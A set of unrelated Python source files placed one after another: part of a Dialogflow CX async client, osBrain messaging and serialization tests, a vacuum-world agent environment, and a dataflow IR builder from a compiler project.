            request.session_entity_type = session_entity_type

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.create_session_entity_type,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Done; return the response.
        return response

    async def update_session_entity_type(
        self,
        request: Optional[Union[
            gcdc_session_entity_type.UpdateSessionEntityTypeRequest, dict
        ]] = None,
        *,
        session_entity_type: Optional[gcdc_session_entity_type.SessionEntityType] = None,
        update_mask: Optional[field_mask_pb2.FieldMask] = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: Optional[float] = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> gcdc_session_entity_type.SessionEntityType:
        r"""Updates the specified session entity type.

        .. code-block:: python

            from google.cloud import dialogflowcx_v3beta1

            def sample_update_session_entity_type():
                # Create a client
                client = dialogflowcx_v3beta1.SessionEntityTypesClient()

                # Initialize request argument(s)
                session_entity_type = dialogflowcx_v3beta1.SessionEntityType()
                session_entity_type.name = "name_value"
                session_entity_type.entity_override_mode = "ENTITY_OVERRIDE_MODE_SUPPLEMENT"
                session_entity_type.entities.value = "value_value"
                session_entity_type.entities.synonyms = ['synonyms_value_1', 'synonyms_value_2']

                request = dialogflowcx_v3beta1.UpdateSessionEntityTypeRequest(
                    session_entity_type=session_entity_type,
                )

                # Make the request
                response = client.update_session_entity_type(request=request)

                # Handle the response
                print(response)

        Args:
            request (Union[google.cloud.dialogflowcx_v3beta1.types.UpdateSessionEntityTypeRequest, dict]):
                The request object. The request message for
                [SessionEntityTypes.UpdateSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.UpdateSessionEntityType].
            session_entity_type (:class:`google.cloud.dialogflowcx_v3beta1.types.SessionEntityType`):
                Required. The session entity type to update. Format:
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``
                or
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``.
                If ``Environment ID`` is not specified, we assume
                default 'draft' environment.

                This corresponds to the ``session_entity_type`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
                The mask to control which fields get
                updated.

                This corresponds to the ``update_mask`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.dialogflowcx_v3beta1.types.SessionEntityType:
                Session entity types are referred to as **User** entity types and are
                   entities that are built for an individual user such
                   as favorites, preferences, playlists, and so on.

                   You can redefine a session entity type at the session
                   level to extend or replace a [custom entity
                   type][google.cloud.dialogflow.cx.v3beta1.EntityType]
                   at the user session level (we refer to the entity
                   types defined at the agent level as "custom entity
                   types").

                   Note: session entity types apply to all queries,
                   regardless of the language.

                   For more information about entity types, see the
                   [Dialogflow
                   documentation](\ https://cloud.google.com/dialogflow/docs/entities-overview).

        """
        # Create or coerce a protobuf request object.
        # Quick check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([session_entity_type, update_mask])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = gcdc_session_entity_type.UpdateSessionEntityTypeRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if session_entity_type is not None:
            request.session_entity_type = session_entity_type
        if update_mask is not None:
            request.update_mask = update_mask

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.update_session_entity_type,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata(
                (("session_entity_type.name", request.session_entity_type.name),)
            ),
        )

        # Send the request.
        response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # Done; return the response.
        return response

    async def delete_session_entity_type(
        self,
        request: Optional[Union[session_entity_type.DeleteSessionEntityTypeRequest, dict]] = None,
        *,
        name: Optional[str] = None,
        retry: OptionalRetry = gapic_v1.method.DEFAULT,
        timeout: Optional[float] = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> None:
        r"""Deletes the specified session entity type.

        .. code-block:: python

            from google.cloud import dialogflowcx_v3beta1

            def sample_delete_session_entity_type():
                # Create a client
                client = dialogflowcx_v3beta1.SessionEntityTypesClient()

                # Initialize request argument(s)
                request = dialogflowcx_v3beta1.DeleteSessionEntityTypeRequest(
                    name="name_value",
                )

                # Make the request
                client.delete_session_entity_type(request=request)

        Args:
            request (Union[google.cloud.dialogflowcx_v3beta1.types.DeleteSessionEntityTypeRequest, dict]):
                The request object. The request message for
                [SessionEntityTypes.DeleteSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.DeleteSessionEntityType].
            name (:class:`str`):
                Required. The name of the session entity type to delete.
                Format:
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``
                or
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``.
                If ``Environment ID`` is not specified, we assume
                default 'draft' environment.

                This corresponds to the ``name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        # Create or coerce a protobuf request object.
        # Quick check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([name])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        request = session_entity_type.DeleteSessionEntityTypeRequest(request)

        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if name is not None:
            request.name = name

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = gapic_v1.method_async.wrap_method(
            self._client._transport.delete_session_entity_type,
            default_timeout=None,
            client_info=DEFAULT_CLIENT_INFO,
        )

        # Certain fields should be provided within the metadata header;
        # add these here.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
        )

        # Send the request.
        await rpc(
            request, retry=retry, timeout=timeout, metadata=metadata,
        )

    async def __aenter__(self):
        return self

    async def __aexit__(self, exc_type, exc, tb):
        await self.transport.close()
# Resolve the installed package version for the x-goog-api-client header;
# fall back to a bare ClientInfo when the distribution metadata is not
# available (e.g. running from a source checkout).
try:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution(
            "google-cloud-dialogflowcx",
        ).version,
    )
except pkg_resources.DistributionNotFound:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()

__all__ = ("SessionEntityTypesAsyncClient",)
| |
import json
import pickle
import time
import pytest
import zmq
import osbrain
from osbrain import run_agent
from osbrain.address import AgentAddressSerializer
from osbrain.agent import TOPIC_SEPARATOR
from osbrain.agent import compose_message
from osbrain.agent import deserialize_message
from osbrain.agent import serialize_message
from osbrain.helper import wait_agent_attr
from .common import echo_handler
from .common import set_received
def test_compose_message():
    """
    Test correct message composing.
    """
    message = b'message'
    topic = b'test topic'
    # Simple serializers prepend the topic directly to the payload
    for name in AgentAddressSerializer.SERIALIZER_SIMPLE:
        composed = compose_message(message, topic, AgentAddressSerializer(name))
        assert composed == topic + message
    # Separator-based serializers insert the topic separator in between
    for name in AgentAddressSerializer.SERIALIZER_SEPARATOR:
        composed = compose_message(message, topic, AgentAddressSerializer(name))
        assert composed == topic + TOPIC_SEPARATOR + message
    # A bogus serializer must raise
    with pytest.raises(Exception):
        compose_message(message, topic, 'foo')
@pytest.mark.parametrize(
    'agent_serial,socket_serial,result',
    [
        (None, None, osbrain.config['SERIALIZER']),
        ('raw', None, 'raw'),
        ('pickle', None, 'pickle'),
        (None, 'raw', 'raw'),
        (None, 'json', 'json'),
        ('pickle', 'json', 'json'),
    ],
)
def test_correct_serialization(nsproxy, agent_serial, socket_serial, result):
    """
    Test that the right serializer is being used when using the different
    initialization options.
    """
    # The socket-level serializer, when given, wins over the agent default
    address = run_agent('a0', serializer=agent_serial).bind(
        'PUB', serializer=socket_serial
    )
    assert address.serializer == result
def test_serialize_message():
    """
    Test basic serialization.
    """
    # Raw: bytes pass through untouched
    raw_payload = b'asdf'
    serialized = serialize_message(message=raw_payload, serializer='raw')
    assert isinstance(serialized, bytes)
    assert serialized == raw_payload
    # Pickle: round-trips through pickle.loads
    payload = [0, 1]
    serialized = serialize_message(message=payload, serializer='pickle')
    assert isinstance(serialized, bytes)
    assert pickle.loads(serialized) == payload
    # Json: round-trips through json.loads
    serialized = serialize_message(message=payload, serializer='json')
    assert isinstance(serialized, bytes)
    assert json.loads(serialized.decode('ascii')) == payload
    # Bytes are not JSON-serializable
    with pytest.raises(TypeError):
        serialize_message(message=b'Hello', serializer='json')
    # Unknown serializer name
    with pytest.raises(ValueError):
        serialize_message(message=payload, serializer='foo')
def test_deserialize_message():
    """
    Test basic deserialization.
    """
    # Raw: bytes come back unchanged
    raw_payload = b'asdf'
    assert deserialize_message(message=raw_payload, serializer='raw') == raw_payload
    # Pickle
    payload = [0, 1]
    pickled = pickle.dumps(payload, -1)
    assert deserialize_message(message=pickled, serializer='pickle') == payload
    # Json
    encoded = json.dumps(payload).encode('ascii')
    assert deserialize_message(message=encoded, serializer='json') == payload
    # Unknown serializer name
    with pytest.raises(ValueError):
        deserialize_message(message=b'x', serializer='foo')
@pytest.mark.parametrize(
    'serializer, message, response',
    [
        ('raw', b'Hello world', b'OK'),
        ('pickle', 'Hello world', 'OK'),
        ('json', 'Hello world', 'OK'),
    ],
)
def test_reqrep(nsproxy, serializer, message, response):
    """
    Simple request-reply pattern between two agents with different
    serializations.
    """

    def reply(agent, request):
        # Always answer with the parametrized response
        return response

    server = run_agent('a0')
    client = run_agent('a1')
    address = server.bind('REP', 'reply', reply, serializer=serializer)
    client.connect(address, 'request')
    assert client.send_recv('request', message) == response
def test_reqrep_raw_zmq_outside(nsproxy):
    """
    Simple request-reply pattern between an agent and a direct ZMQ connection.

    The agent binds a raw (no serialization) REP socket with an echo
    handler, so the plain ZMQ REQ client must receive its own bytes back.
    """
    # Create an osBrain agent that will receive the message
    a1 = run_agent('a1')
    a1.set_attr(received=None)
    addr = a1.bind(
        'REP', transport='tcp', handler=echo_handler, serializer='raw'
    )
    # Create a raw ZeroMQ REQ socket
    context = zmq.Context()
    socket = context.socket(zmq.REQ)
    socket.connect('tcp://%s:%s' % (addr.address.host, addr.address.port))
    # Send the message and expect it echoed back verbatim.
    message = b'Hello world'
    socket.send(message)
    assert socket.recv() == message
    socket.close()
    context.destroy()
@pytest.mark.parametrize(
    'serializer, message',
    [
        ('raw', b'Hello world'),
        ('pickle', 'Hello world'),
        ('json', 'Hello world'),
    ],
)
def test_pushpull(nsproxy, serializer, message):
    """
    Simple push-pull pattern test, using different serializations.
    """
    a0 = run_agent('a0')
    a1 = run_agent('a1')
    a1.set_attr(received=None)
    addr = a1.bind('PULL', handler=set_received, serializer=serializer)
    a0.connect(addr, 'push')
    a0.send('push', message)
    # PUSH is asynchronous: poll until the handler stored the message.
    assert wait_agent_attr(a1, name='received', value=message)
def test_pushpull_raw_zmq_outside(nsproxy):
    """
    Simple push-pull pattern test. Channel without serialization.
    The message is sent from outside osBrain, through a ZMQ PUSH socket.
    """
    # Create an osBrain agent that will receive the message
    a1 = run_agent('a1')
    a1.set_attr(received=None)
    addr = a1.bind(
        'PULL', transport='tcp', handler=set_received, serializer='raw'
    )
    # Create a raw ZeroMQ PUSH socket
    context = zmq.Context()
    socket = context.socket(zmq.PUSH)
    socket.connect('tcp://%s:%s' % (addr.address.host, addr.address.port))
    # Send the message; delivery is asynchronous, so poll for it.
    message = b'Hello world'
    socket.send(message)
    assert wait_agent_attr(a1, name='received', value=message)
    socket.close()
    context.destroy()
@pytest.mark.parametrize(
    'serializer, message',
    [
        ('raw', b'Hello world'),
        ('pickle', 'Hello world'),
        ('json', 'Hello world'),
    ],
)
def test_pubsub(nsproxy, serializer, message):
    """
    Simple publisher-subscriber pattern test with different serializations.
    """
    a0 = run_agent('a0')
    a1 = run_agent('a1')
    a1.set_attr(received=None)
    addr = a0.bind('PUB', alias='pub', serializer=serializer)
    a1.connect(addr, handler=set_received)
    # PUB/SUB drops messages sent before the subscription is live
    # ("slow joiner"), so keep publishing until one gets through.
    # NOTE(review): this loop has no timeout and relies on the global
    # pytest timeout to bail out if delivery never succeeds.
    while not a1.get_attr('received'):
        a0.send('pub', message)
        time.sleep(0.1)
    assert a1.get_attr('received') == message
def test_pubsub_raw_zmq_outside(nsproxy):
    """
    Simple publisher-subscriber pattern test. Channel without serialization.
    The message is sent from outside osBrain, through a ZMQ PUB socket.
    """
    # Create an osBrain agent that will receive the message
    a1 = run_agent('a1')
    a1.set_attr(received=None)
    addr = a1.bind(
        'SUB', transport='tcp', handler=set_received, serializer='raw'
    )
    # Create a raw ZeroMQ PUB socket
    context = zmq.Context()
    socket = context.socket(zmq.PUB)
    socket.connect('tcp://%s:%s' % (addr.address.host, addr.address.port))
    # Keep publishing until the subscriber sees one message
    # (PUB/SUB drops anything sent before the subscription is live).
    message = b'Hello world'
    while not a1.get_attr('received'):
        socket.send(message)
        time.sleep(0.01)
    assert a1.get_attr('received') == message
    socket.close()
    context.destroy()
| |
import agents as ag
import envgui as gui
import random
# ______________________________________________________________________________
loc_A, loc_B = (1, 1), (2, 1) # The two locations for the Vacuum world
def RandomVacuumAgent():
    """Return an agent that picks a random vacuum-world action each step."""
    actions = ['Right', 'Left', 'Up', 'Down', 'Suck', 'NoOp']
    return ag.Agent(ag.RandomAgentProgram(actions))
def TableDrivenVacuumAgent():
    """A table-driven agent for the two-state vacuum world. [Figure 2.3]

    The table maps full percept histories to actions; only a few history
    prefixes are enumerated here (the source comments mark the omissions).
    """
    table = {((loc_A, 'Clean'),): 'Right',
             ((loc_A, 'Dirty'),): 'Suck',
             ((loc_B, 'Clean'),): 'Left',
             ((loc_B, 'Dirty'),): 'Suck',
             ((loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
             ((loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
             # ...
             ((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
             ((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
             # ...
             }
    p = ag.TableDrivenAgentProgram(table)
    # Fix: the table program was built but never passed to the agent,
    # so the agent had no program at all.
    return ag.Agent(p)
def ReflexVacuumAgent():
    "A reflex agent for the two-state vacuum environment. [Figure 2.8]"
    def program(percept):
        # Decide purely from the current percept: (location, status).
        location, status = percept
        if status == 'Dirty':
            return 'Suck'
        if location == loc_A:
            return 'Right'
        if location == loc_B:
            return 'Left'
    return ag.Agent(program)
def ModelBasedVacuumAgent() -> object:
    "An agent that keeps track of what locations are clean or dirty."
    # Shared state: last observed status of each location.
    model = {loc_A: None, loc_B: None}
    def program(percept):
        "Same as ReflexVacuumAgent, except if everything is clean, do NoOp."
        location, status = percept
        model[location] = status  # remember what we just saw
        if model[loc_A] == model[loc_B] == 'Clean':
            return 'NoOp'
        if status == 'Dirty':
            return 'Suck'
        if location == loc_A:
            return 'Right'
        if location == loc_B:
            return 'Left'
    return ag.Agent(program)
# ______________________________________________________________________________
# Vacuum environment
class Dirt(ag.Thing):
    """Marker Thing: a square containing a Dirt instance is dirty."""
    pass
# class Floor(ag.Thing):
# pass
class VacuumEnvironment(ag.XYEnvironment):
    """The environment of [Ex. 2.12]. Agent perceives dirty or clean,
    and bump (into obstacle) or not; 2D discrete world of unknown size;
    performance measure is 100 for each dirt cleaned, and -1 for
    each turn taken."""
    def __init__(self, width=4, height=3):
        super(VacuumEnvironment, self).__init__(width, height)
        self.add_walls()
    def thing_classes(self):
        # NOTE(review): the agent entries here are factory functions, not
        # classes -- confirm callers only use this list for lookups.
        return [ag.Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,
                TableDrivenVacuumAgent, ModelBasedVacuumAgent]
    def percept(self, agent):
        """The percept is a tuple of ('Bump' or 'None', 'Dirty' or 'Clean').
        Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
        # Fix: the docstring previously stated the reversed tuple order;
        # the code returns (bump, status), so document it that way.
        status = ('Dirty' if self.some_things_at(
            agent.location, Dirt) else 'Clean')
        bump = ('Bump' if agent.bump else 'None')
        return (bump, status)
    def execute_action(self, agent, action):
        """Apply *action*: 'Suck' removes one Dirt for +100 performance;
        any action other than 'NoOp' also costs 1 performance point."""
        if action == 'Suck':
            dirt_list = self.list_things_at(agent.location, Dirt)
            if dirt_list:
                dirt = dirt_list[0]
                agent.performance += 100
                self.delete_thing(dirt)
        else:
            super(VacuumEnvironment, self).execute_action(agent, action)
        if action != 'NoOp':
            agent.performance -= 1
class TrivialVacuumEnvironment(VacuumEnvironment):
    """This environment has two locations, A and B. Each can be Dirty
    or Clean. The agent perceives its location and the location's
    status. This serves as an example of how to implement a simple
    Environment."""
    def __init__(self):
        super(TrivialVacuumEnvironment, self).__init__()
        # choice is 0..3: bit 0 selects dirt at A, bit 1 selects dirt at
        # B, so all four dirt configurations are equally likely.
        choice = random.randint(0, 3)
        if choice % 2:  # 1 or 3
            self.add_thing(Dirt(), loc_A)
        if choice > 1:  # 2 or 3
            self.add_thing(Dirt(), loc_B)
    def percept(self, agent):
        "Returns the agent's location, and the location status (Dirty/Clean)."
        status = ('Dirty' if self.some_things_at(
            agent.location, Dirt) else 'Clean')
        return (agent.location, status)
    #
    # def execute_action(self, agent, action):
    #     """Change agent's location and/or location's status; track performance.
    #     Score 10 for each dirt cleaned; -1 for each move."""
    #     if action == 'Right':
    #         agent.location = loc_B
    #         agent.performance -= 1
    #     elif action == 'Left':
    #         agent.location = loc_A
    #         agent.performance -= 1
    #     elif action == 'Suck':
    #         if self.status[agent.location] == 'Dirty':
    #             agent.performance += 10
    #         self.status[agent.location] = 'Clean'
    #
    def add_agent(self, a):
        "Agents start in either location at random."
        super().add_thing(a, random.choice([loc_A, loc_B]))
# _________________________________________________________________________
# >>> a = ReflexVacuumAgent()
# >>> a.program((loc_A, 'Clean'))
# 'Right'
# >>> a.program((loc_B, 'Clean'))
# 'Left'
# >>> a.program((loc_A, 'Dirty'))
# 'Suck'
# >>> a.program((loc_A, 'Dirty'))
# 'Suck'
#
# >>> e = TrivialVacuumEnvironment()
# >>> e.add_thing(ModelBasedVacuumAgent())
# >>> e.run(5)
# Produces text-based status output
# v = TrivialVacuumEnvironment()
# a = ModelBasedVacuumAgent()
# a = ag.TraceAgent(a)
# v.add_agent(a)
# v.run(10)
# Launch GUI of Trivial Environment
# v = TrivialVacuumEnvironment()
# a = RandomVacuumAgent()
# a = ag.TraceAgent(a)
# v.add_agent(a)
# g = gui.EnvGUI(v, 'Vaccuum')
# c = g.getCanvas()
# c.mapImageNames({
# Dirt: 'images/dirt.png',
# ag.Wall: 'images/wall.jpg',
# # Floor: 'images/floor.png',
# ag.Agent: 'images/vacuum.png',
# })
# c.update()
# g.mainloop()
# Launch GUI of more complex environment
# Build a 5x4 vacuum world, drop in a traced random agent and scattered
# dirt, and run the Tk GUI until the window is closed.
v = VacuumEnvironment(5, 4)
#a = ModelBasedVacuumAgent()
a = RandomVacuumAgent()
a = ag.TraceAgent(a)  # wrap so each percept/action is printed
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
# NOTE(review): 'Vaccuum' is a typo, but it is a user-visible window
# title string, so it is left untouched here.
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
# Map each Thing class to the image the canvas should draw for it.
c.mapImageNames({
    ag.Wall: './submissions/Colburn/Myface.jpg',
    # Floor: 'images/floor.png',
    Dirt: 'images/dirt.png',
    ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()  # blocks until the GUI window is closed
| |
# Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from language.python import ast
from analysis.dataflowIR import graph
from analysis.storegraph import storegraph
from analysis.dataflowIR.transform import dce
class AbstractState(object):
    """Base class for slot-tracking states within a single hyperblock.

    Maps slots to dataflow nodes, lazily filling missing entries through
    generate(), which concrete subclasses must implement.
    """
    def __init__(self, hyperblock, predicate):
        assert predicate.hyperblock is hyperblock
        self.hyperblock = hyperblock
        self.predicate = predicate
        self.slots = {}
    def freeze(self):
        """Hook: mark this state read-only.  No-op in the base class."""
        pass
    def split(self, predicates):
        """Fork one child State per predicate, with this state as parent."""
        return [State(self.hyperblock, p, self) for p in predicates]
    def get(self, slot):
        """Return the node bound to *slot*, generating and caching it
        on first access."""
        if slot in self.slots:
            return self.slots[slot]
        value = self.generate(slot)
        self.slots[slot] = value
        return value
    def generate(self, slot):
        raise NotImplementedError
class State(AbstractState):
    """A mutable child state; missing slot reads fall through to the
    (frozen) parent state."""
    def __init__(self, hyperblock, predicate, parent):
        assert parent.hyperblock is hyperblock
        AbstractState.__init__(self, hyperblock, predicate)
        self.parent = parent
        self.frozen = False
        # Once a child exists, the parent must not change any more.
        parent.freeze()
    def freeze(self):
        """Forbid further set() calls on this state."""
        self.frozen = True
    def generate(self, slot):
        # Inherit unknown slots from the parent state.
        return self.parent.get(slot)
    def set(self, slot, value):
        assert not self.frozen
        self.slots[slot] = value
def gate(pred, value):
    """Route *value* through a Gate node controlled by *pred* and return
    the gated copy of the node."""
    # Note: the local was renamed from `gate` to `g` so it no longer
    # shadows this function's own name.
    g = graph.Gate(pred.hyperblock)
    g.setPredicate(pred)
    g.addRead(value)
    if isinstance(value, graph.ExistingNode):
        # Existing (constant) nodes cannot be duplicated; gate into a
        # fresh local instead.
        gated = graph.LocalNode(pred.hyperblock)
    else:
        gated = value.duplicate()
    g.addModify(gated)
    return g.modify
def gatedMerge(hyperblock, pairs):
    # Merge (predicate, value) pairs into a single node inside
    # *hyperblock*, gating each incoming value by its predicate.
    if len(pairs) == 1:
        # A single-predecessor merge is unexpected.  Note: under
        # "python -O" the assert is stripped and the lines below still
        # handle it by gating the lone value without a Merge node.
        assert False, "single gated merge?"
        pred, value = pairs[0]
        result = gate(pred, value)
    else:
        m = graph.Merge(hyperblock)
        # The merged node mirrors the first value, re-homed in *hyperblock*.
        result = pairs[0][1].duplicate()
        result.hyperblock = hyperblock
        m.modify = result.addDefn(m)
        for pred, value in pairs:
            # Create the gate
            # TODO will the predicate always have the right hyperblock?
            temp = gate(pred, value)
            # Merge the gate
            m.addRead(temp)
        result = m.modify
    return result
class DeferedMerge(AbstractState):
    """Lazily merges slot values from several predecessor states.

    A slot is materialized only when first requested: if every
    predecessor agrees, the shared node is reused, otherwise a gated
    Merge node is built.
    """
    def __init__(self, hyperblock, predicate, states):
        AbstractState.__init__(self, hyperblock, predicate)
        self.states = states
    def generate(self, slot):
        values = [state.get(slot) for state in self.states]
        distinct = set(values)
        if len(distinct) == 1:
            # All predecessors hold the same node; no merge needed.
            return distinct.pop()
        pairs = [(state.predicate, state.get(slot)) for state in self.states]
        return gatedMerge(self.hyperblock, pairs)
class DeferedEntryPoint(AbstractState):
    """State at the entry of the dataflow graph.

    Slots read before being written are materialized on demand as graph
    entries (heap fields), constants, or null (undefined locals /
    fields of killed objects).
    """
    def __init__(self, hyperblock, predicate, code, dataflow):
        AbstractState.__init__(self, hyperblock, predicate)
        self.code = code
        self.dataflow = dataflow
    def generate(self, slot):
        if isinstance(slot, ast.Local):
            # Parameters are explicitly set; anything else read here is
            # an undefined local.
            return self.dataflow.null
        if isinstance(slot, ast.Existing):
            return self.dataflow.getExisting(slot)
        # Fields of killed objects cannot come from beyond the entry point.
        killed = self.code.annotation.killed.merged
        if slot.object in killed:
            return self.dataflow.null
        field = graph.FieldNode(self.hyperblock, slot)
        self.dataflow.entry.addEntry(slot, field)
        return field
    def set(self, slot, value):
        # Entry-point writes (parameters) are also recorded as graph entries.
        self.slots[slot] = value
        self.dataflow.entry.addEntry(slot, value)
class CodeToDataflow(TypeDispatcher):
    """Translates a code object's AST into a dataflow IR graph.

    Walks the AST via TypeDispatcher, threading a single "current" State
    that maps slots (locals and memory fields) to dataflow nodes.
    Branches split the state per predicate; joins merge them back with
    gated Merge nodes.  Call processCode() to run the translation.
    """
    def __init__(self, code):
        self.uid = 0
        hyperblock = self.newHyperblock()
        self.code = code
        self.dataflow = graph.DataflowGraph(hyperblock)
        self.dataflow.initPredicate()
        # The entry state lazily materializes parameters / heap fields.
        self.entryState = DeferedEntryPoint(hyperblock, self.dataflow.entryPredicate, self.code, self.dataflow)
        self.current = State(hyperblock, self.dataflow.entryPredicate, self.entryState)
        self.returns = []          # states captured at each ast.Return
        self.allModified = set()   # every slot written during translation
    def newHyperblock(self):
        """Create a fresh hyperblock with a unique numeric name."""
        name = self.uid
        self.uid += 1
        return graph.Hyperblock(name)
    def branch(self, predicates):
        """Consume the current state and fork one child per predicate."""
        current = self.popState()
        branches = current.split(predicates)
        return branches
    def setState(self, state):
        """Install *state* as current; there must be none installed."""
        assert self.current is None
        self.current = state
    def popState(self):
        """Detach and return the current state, leaving None installed."""
        old = self.current
        self.current = None
        return old
    def mergeStates(self, states):
        """Join several exit states into one and install it as current.

        None entries (already-consumed paths) are dropped first.
        """
        # TODO predicated merge / mux?
        states = [state for state in states if state is not None]
        if len(states) == 1:
            # TODO is this sound? Does it interfere with hyperblock definition?
            state = states.pop()
        else:
            # TODO only create a new hyperblock when merging from different hyperblocks?
            hyperblock = self.newHyperblock()
            # Merge the branch predicates themselves to form the new
            # hyperblock's predicate.
            pairs = [(state.predicate, state.predicate) for state in states]
            predicate = gatedMerge(hyperblock, pairs)
            predicate.name = repr(hyperblock)
            state = DeferedMerge(hyperblock, predicate, states)
            state = State(hyperblock, predicate, state)
        self.setState(state)
        return state
    def get(self, slot):
        """Read the node currently bound to *slot*."""
        return self.current.get(slot)
    def set(self, slot, value):
        """Bind *slot* to *value* and record the modification."""
        value.addName(slot)
        self.allModified.add(slot)
        return self.current.set(slot, value)
    def pred(self):
        """Predicate of the current state."""
        return self.current.predicate
    def hyperblock(self):
        """Hyperblock of the current state."""
        return self.current.hyperblock
    def localTarget(self, lcl):
        """Create a fresh LocalNode for assignment target *lcl*."""
        if isinstance(lcl, ast.Local):
            node = graph.LocalNode(self.hyperblock(), (lcl,))
        else:
            assert False
        return node
    def handleOp(self, node, targets):
        """Dispatch *node* into a GenericOp and wire its local outputs."""
        g = self(node)
        assert isinstance(g, graph.GenericOp), (node, g)
        for lcl in targets:
            target = self.localTarget(lcl)
            self.set(lcl, target)
            g.addLocalModify(lcl, target)
    def handleMemory(self, node, g):
        """Wire the heap reads/modifies annotated on *node* into op *g*."""
        # Reads
        for read in node.annotation.reads.merged:
            slot = self.get(read)
            g.addRead(read, slot)
        # Pseudo reads: modified fields are also read so the old value
        # is threaded through the op.
        for modify in node.annotation.modifies.merged:
            slot = self.get(modify)
            g.addPsedoRead(modify, slot)
        # Modifies: each modified field gets a fresh node.
        for modify in node.annotation.modifies.merged:
            slot = graph.FieldNode(self.hyperblock(), modify)
            self.set(modify, slot)
            g.addModify(modify, slot)
    def localRead(self, g, lcl):
        """Wire a local/constant operand read into op *g* (ignores None)."""
        if isinstance(lcl, (ast.Local, ast.Existing)):
            g.addLocalRead(lcl, self.get(lcl))
    @dispatch(ast.Allocate)
    def processAllocate(self, node):
        g = graph.GenericOp(self.hyperblock(), node)
        g.setPredicate(self.pred())
        self.localRead(g, node.expr)
        self.handleMemory(node, g)
        return g
    @dispatch(ast.Load)
    def processLoad(self, node):
        g = graph.GenericOp(self.hyperblock(), node)
        g.setPredicate(self.pred())
        self.localRead(g, node.expr)
        self.localRead(g, node.name)
        self.handleMemory(node, g)
        return g
    @dispatch(ast.DirectCall)
    def processDirectCall(self, node):
        g = graph.GenericOp(self.hyperblock(), node)
        g.setPredicate(self.pred())
        self.localRead(g, node.selfarg)
        for arg in node.args:
            self.localRead(g, arg)
        self.localRead(g, node.vargs)
        self.localRead(g, node.kargs)
        self.handleMemory(node, g)
        return g
    @dispatch(ast.Local, ast.Existing)
    def visitLocalRead(self, node):
        return self.get(node)
    @dispatch(ast.Assign)
    def processAssign(self, node):
        if isinstance(node.expr, (ast.Local, ast.Existing)) and len(node.lcls) == 1:
            # Local copy: no op node needed, just rebind the slot.
            target = node.lcls[0]
            g = self.get(node.expr)
            self.set(target, g)
        else:
            self.handleOp(node.expr, node.lcls)
    @dispatch(ast.Discard)
    def processDiscard(self, node):
        # Evaluate for side effects only; no local targets.
        self.handleOp(node.expr, [])
